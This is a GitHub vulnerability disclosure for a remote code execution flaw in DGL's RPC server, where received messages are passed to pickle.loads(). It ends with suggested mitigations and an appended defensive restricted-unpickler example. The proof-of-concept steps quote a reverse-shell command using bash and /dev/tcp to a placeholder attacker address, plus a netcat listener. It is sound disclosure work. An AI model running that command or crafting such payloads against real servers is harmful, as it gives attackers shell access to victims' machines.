
Vulnerability: Remote Code Execution by Pickle Deserialization via rpc.recv_request() in dmlc/dgl #7874

Open
Chenpinji opened this issue Mar 4, 2025 · 0 comments

Comments

@Chenpinji

Description

dgl implements an RPC server (start_server() in rpc_server.py) to support RPC communication among different remote users over networks (i.e. via "ip_config"). In its core function rpc.recv_request(), I found that it calls the function recv_rpc_message() and then deserialize_from_payload(), which directly uses pickle.loads() to deserialize the received messages without any sanitization, hence resulting in a remote code execution vulnerability in this RPC server.

Proof of Concept

  • Step 1:
    The victim user starts an RPC server that connects to its network interface. Here, I use part of the official test code in the GitHub repo (test_rpc.py) to initialize the server; you can also reproduce the PoC by initializing your own RPC server with dgl.distributed.start_server().
    We give our example code in the attachment (code.zip); you can reproduce it directly with server.py.

  • Step 2:
    The attacker can then send malicious pickle dump data to the remote RPC address for the attack. We give an example to show how an attacker can acquire a command shell:

In this example, the attacker modifies rpc_client and sends a request containing malicious pickle dump data to make the victim execute the command "bash -c 'bash -i >& /dev/tcp/{ip address}/4444 0>&1'", where {ip address} is the attacker's server.

  • Step 3:
    The attacker can use the nc tool (nc -l 4444) to create a reverse shell and wait for a connection. Then, the attacker runs the client to send the malicious request. Because of the pickle deserialization vulnerability, the victim RPC server will execute the malicious command and consequently let the attacker get a command shell on the victim machine.

We also give a demo video in the attachment, along with modified rpc.py.

Impact

Remote code execution in the victim's machine.

Mitigation

(1) Sanitize RPCMessage.data before calling pickle.loads on it, or use more secure deserialization methods such as safetensor or msgpack to replace the insecure pickle.loads.
(2) Enable authentication in RPC services to ensure that only authenticated and trusted users are permitted to join the same cluster.
(3) Emit a warning when using pickle to load data over the network.

dgl-rce-demo.mp4
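Mitigation (1) in practice, as an added example that is not part of this issue or of DGL's code: `safe_loads()` is a hypothetical replacement for the bare `pickle.loads()` inside `deserialize_from_payload()`. It first scans the payload's opcodes with `pickletools` and refuses anything that can reference or call an importable object, then, as a second layer, loads through an `Unpickler` whose `find_class` always raises. All names and the sample payloads are constructed for this illustration.

```python
import io
import pickle
import pickletools

# Opcodes through which a pickle can name and invoke an importable object.
# Plain data (dicts, lists, strings, numbers) never needs any of them.
_UNSAFE_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
               "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def unsafe_opcodes(payload: bytes) -> set:
    """Return the dangerous opcodes present in payload (empty set if none)."""
    return {op.name for op, _arg, _pos in pickletools.genops(payload)
            if op.name in _UNSAFE_OPS}

class RestrictedUnpickler(pickle.Unpickler):
    """Second layer: refuse every global lookup, so only plain data loads."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")

def safe_loads(payload: bytes):
    """Hypothetical replacement for the bare pickle.loads() in
    deserialize_from_payload(): scan the opcodes, then load restricted."""
    found = unsafe_opcodes(payload)
    if found:
        raise pickle.UnpicklingError(f"refusing payload with {sorted(found)}")
    return RestrictedUnpickler(io.BytesIO(payload)).load()

def is_rejected(payload: bytes) -> bool:
    """True if safe_loads refuses the payload (malformed pickles included)."""
    try:
        safe_loads(payload)
    except (pickle.UnpicklingError, ValueError):
        return True
    return False

# Constructed sample: a plain-data request, as a benign RPC message might be.
BENIGN = pickle.dumps({"op": "get", "keys": [1, 2, 3]})

class _Reducer:
    """Constructed stand-in for an object whose unpickling calls a callable.
    The callable is the harmless builtin len(); what matters is that the
    payload carries a global reference plus REDUCE, as any pickle that
    runs code on load must."""
    def __reduce__(self):
        return (len, ("",))

REFERENCING = pickle.dumps(_Reducer())
```

Note that the opcode scan also rejects legitimate pickled class instances, so this only works once the RPC message format is restricted to plain data (or moved to msgpack as the issue suggests).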